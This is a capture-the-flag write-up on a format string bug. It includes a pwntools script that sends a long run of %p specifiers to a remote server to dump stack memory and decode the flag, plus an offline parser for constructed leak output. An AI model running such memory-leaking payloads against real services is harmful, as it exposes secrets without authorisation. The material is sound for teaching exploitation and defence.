Tags: formatstring 

Rating:

This is a format string bug. Sending a few %p specifiers, over a few separate connections, shows leaked values wider than 32 bits that change from run to run, so the target is a 64-bit binary with ASLR enabled. As it turns out, the flag itself sits on the stack, so dumping a long run of stack words with %p discloses it; all that remains is to undo the byte order, since each leaked word is printed as a little-endian integer and has to be byte-reversed to read as text.

~~~
from pwn import *

def try_readline(conn):
   # Read one line; on EOF return an empty line instead of retrying forever.
   try:
      return conn.recvline()
   except EOFError:
      return b''

def make_hex_decodable(s):
   # %p strips leading zeros, so a word may print with an odd number of digits.
   return b'0' + s if len(s) % 2 else s

r = remote('91.231.84.36', 9001)

try_readline(r)            # wanna see?
r.sendline(b'%p' * 100)    # leak 100 stack words through the format string bug
try_readline(r)            # ok, so...
memory_dump = try_readline(r)

# NULL words print as "(nil)"; drop them, then split the rest on the 0x prefix
# (hex digits never contain an 'x', so the split is unambiguous).
memory_dump = memory_dump.replace(b'(nil)', b'')
memory_dump = [w.strip() for w in memory_dump.split(b'0x') if w.strip()]
memory_dump = [make_hex_decodable(w) for w in memory_dump]

# Each word is a little-endian integer: reverse its bytes to get memory order.
print(b''.join(bytes.fromhex(w.decode())[::-1] for w in memory_dump))
~~~
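The same reasoning worked through offline, as an added example that is not part of the original writeup: the %p dump lines below are constructed to look like what a 64-bit, ASLR-enabled binary with the flag on its stack would echo back, the flag format flag{...} is assumed, and the code shows how the word width gives away 64-bit, how two connections give away ASLR, and how the little-endian words are put back into memory order before searching for the flag. It also handles the separator-free output properly, which the split-on-0x approach does not need but a regex does.

```python
import re
from typing import List, Optional

# Constructed sample output (made up for this example, not from the challenge
# server): what a 64-bit, ASLR-enabled binary with the flag on its stack might
# echo back for a long "%p%p%p..." format string.  Two connections are shown so
# that the randomized addresses can be compared.
DUMP_RUN1 = (b"0x7ffd3c1a2b60(nil)0x7f2a9c4e1234(nil)0x1"
             b"0x4141417b67616c660x42424242424242420x7d4343(nil)0x7ffd3c1a2c90\n")
DUMP_RUN2 = (b"0x7ffe1e9f5a40(nil)0x7f51b2c97234(nil)0x1"
             b"0x4141417b67616c660x42424242424242420x7d4343(nil)0x7ffe1e9f5b70\n")
# A constructed 32-bit run for comparison: nothing here exceeds 32 bits.
DUMP_32BIT = b"0xffd5a3c0(nil)0xf7e21000(nil)0x1\n"

# One %p token: "(nil)" for a NULL word, or "0x" plus hex digits.  The output
# has no separators, so digits are matched lazily up to the next token start;
# a word ending in 0 directly followed by another "0x" stays unambiguous
# because 'x' never occurs inside a hex number.
_TOKEN = re.compile(rb"\(nil\)|0x([0-9a-f]+?)(?=0x|\(nil\)|[^0-9a-f]|$)")

def parse_dump(dump: bytes) -> List[int]:
    """Split a concatenated %p dump into the words it printed, in stack order (NULL -> 0)."""
    return [0 if m.group(1) is None else int(m.group(1), 16)
            for m in _TOKEN.finditer(dump)]

def guess_word_size(words: List[int]) -> int:
    """%p strips leading zeros, so any value wider than 32 bits proves a 64-bit
    target; with nothing wider than 32 bits, assume a 32-bit binary."""
    return 8 if any(w > 0xFFFFFFFF for w in words) else 4

def looks_randomized(run1: List[int], run2: List[int]) -> bool:
    """ASLR check across two connections: the same stack layout (same number of
    leaked words) but at least one word, i.e. a pointer, changed value."""
    return len(run1) == len(run2) and any(a != b for a, b in zip(run1, run2))

def words_to_memory(words: List[int], word_size: int) -> bytes:
    """Re-serialize each word little-endian so the bytes come out in memory order.
    %p drops leading zero bytes; a fixed-width to_bytes() restores them as NULs."""
    return b"".join(w.to_bytes(word_size, "little") for w in words)

# Assumed flag format; change the prefix to match the CTF's.
FLAG_RE = re.compile(rb"flag\{[ -~]*?\}")

def recover_flag(dump: bytes) -> Optional[bytes]:
    """Parse one dump line and pull the flag out of the reconstructed stack bytes."""
    words = parse_dump(dump)
    memory = words_to_memory(words, guess_word_size(words))
    m = FLAG_RE.search(memory)
    return m.group(0) if m else None

if __name__ == "__main__":
    w1, w2 = parse_dump(DUMP_RUN1), parse_dump(DUMP_RUN2)
    print("word size:", guess_word_size(w1), "ASLR:", looks_randomized(w1, w2))
    print("flag:", recover_flag(DUMP_RUN1))
```

Re-serializing with a fixed-width to_bytes() rather than reversing the hex digits matters when a leaked word has leading zero bytes (a short string at the end of the flag, for instance): the NULs are restored in the right place instead of the text from neighbouring words being run together.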